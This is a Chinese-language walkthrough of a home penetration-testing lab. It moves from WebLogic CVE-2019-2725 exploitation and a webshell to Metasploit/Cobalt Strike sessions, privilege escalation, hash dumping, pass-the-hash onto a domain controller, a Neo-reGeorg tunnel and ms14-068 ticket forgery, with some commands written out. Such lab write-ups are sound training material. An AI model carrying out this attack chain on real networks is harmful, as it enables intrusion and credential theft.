一、环境搭建:
1、根据作者公开的靶机信息整理:
靶场统一登录密码:1qaz@WSX
2、网络环境配置:
①Win2008双网卡模拟内外网:
外网:192.168.1.80,桥接模式与物理机相通
内网:10.10.10.80,仅主机模式
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163434553-1916761121.png)
②PC-win7只有内网:
内网:10.10.10.201,仅主机模式
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163437521-116973672.png)
③win2012-DC只有内网:
内网:10.10.10.10,仅主机模式
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163439586-1688265759.png)
启动web服务:
运行C:\Oracle\Middleware\user_projects\domains\base_domain下的bat文件(注意这里要右键以管理员身份运行):
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163501636-1036609675.png)
然后访问7001端口+console让其自动部署即可启动好环境
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163623839-1721446440.png)
启动完成结果:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163647050-1514417620.png)
二、web层渗透:
1、信息收集:
①利用nmap扫描web服务器端口以及开放的服务
nmap -sS -T4 192.168.1.80
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163725257-1965875695.png)
根据端口信息,整理渗透思路:
445和3389端口可以用17010或0708打一波,7001端口weblogic反序列化漏洞getshell
2、Getshell:
②weblogic反序列getshell
既然存在7001weblogic,直接利用exp打一波,可以看到是检测出有2019-2725反序列化漏洞
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163754208-1294812300.png)
执行命令:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163801146-422323405.png)
直接上传冰蝎shell:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163805961-1917124131.png)
根据返回的webshell地址,使用冰蝎进行连接:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163814983-1200062848.png)
二、内网渗透:
1、派生cs和msf会话:
①利用冰蝎反弹msf会话
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163833913-236083932.png)
配置监听即可获取到会话:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163841125-931915662.png)
②cs上线:
首先尝试msf派生给cs但是失败了,所以就利用cs生成payload,上传到目标并执行
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163851200-836015998.png)
成功上线:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163906128-916970946.png)
③提权beacon
直接使用ms15-051提权
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163917597-87463087.png)
提权成功会返回一个system权限的beacon
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163928073-671835803.png)
2、内网信息收集:
①查看网卡信息
发现存在域de1ay.com,DNS服务器地址为10.10.10.10(一般为域控)
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163943089-1671434220.png)
②获取域内信息
用户信息:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163954043-401121705.png)
域内机器信息:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613163959130-304796384.png)
域管信息:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164005709-430574908.png)
域控信息:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164010298-1506525241.png)
③Dump hashes
在web服务器机器上抓取到两个账号的明文和hash,并且权限都挺高的…
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164016006-1984872081.png)
3、横向移动:
①系统漏洞尝试
首先添加10.10.10.0网段的路由
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164035271-1712228664.png)
然后利用ms17-010尝试一波,存在漏洞,但是拿不下shell,0708也是同样的问题,遂放弃此方法
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164040617-1837631075.png)
②pass the hash --> PC
利用cs特殊的smb beacon(十分好用)进行pth攻击:选择一个凭证,监听器选择smb的,并且用一个能访问目标主机的beacon发起攻击
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164046971-1904354615.png)
攻击完成,成功拿下pc主机10.10.10.201的beacon:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164057800-1098401139.png)
然后继续dump hash,又成功获取到mssql用户的明文和hash:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164102369-1749695401.png)
②pass the hash --> DC
利用以上同样的方法pth到域控
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164110787-1503168572.png)
域控beacon成功上线:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164120699-274254255.png)
然后直接dump域内所有hash:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164124920-1066175630.png)
4、另类提权方法-ms14-068:
①利用Neo-reGeorg搭建socks5代理
将脚本上传到与webshell同目录下
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164139399-1605634062.png)
python neoreg.py -k cmd -u http://192.168.1.80:7001//_async/tunnel.jsp -p 1080
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164144956-1215489885.png)
然后代理工具配置127.0.0.1:1080即可
②获取域用户sid
通过进程注入,降权一个mssql域用户的beacon回来:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164212364-386209236.png)
然后执行命令获取域用户的sid:
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164218225-237419481.png)
③pykey获取票据(使用proxychains代理进目标内网)
proxychains python ms14-068.py -u mssql@de1ay.com -s <SID> -p <密码> -d <域控ip>
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164237602-1789612487.png)
利用KrbCredExport.py转换票据格式:
python2 KrbCredExport.py TGT_mssql@de1ay.com.ccache mssql.ticket
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164255329-1076065972.png)
④使用cs进行票据注入
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164306410-1752229271.png)
注入成功就可以使用dir等命令操作域控了
![](https://img2020.cnblogs.com/blog/2063846/202006/2063846-20200613164314076-893841998.png)
三、总结:
①通过信息收集发现7001,利用反序列化直接getshell
②利用冰蝎反弹msf会话,并添加路由扫描内网尝试进行横向移动
③pth与cs的smb beacon的横向利用
④Neo-reGeorg搭建socks5代理
⑤ms14-068的域内提权利用